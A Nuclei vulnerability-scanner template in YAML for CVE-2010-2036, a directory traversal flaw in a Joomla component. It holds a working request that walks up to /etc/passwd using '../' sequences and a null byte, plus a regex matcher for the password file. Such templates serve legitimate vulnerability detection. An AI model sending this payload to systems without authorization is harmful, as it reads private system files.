my-nuclei-templates/CVE-2010-2036.yaml

35 lines
1.1 KiB
YAML

id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
- http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt
- http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/17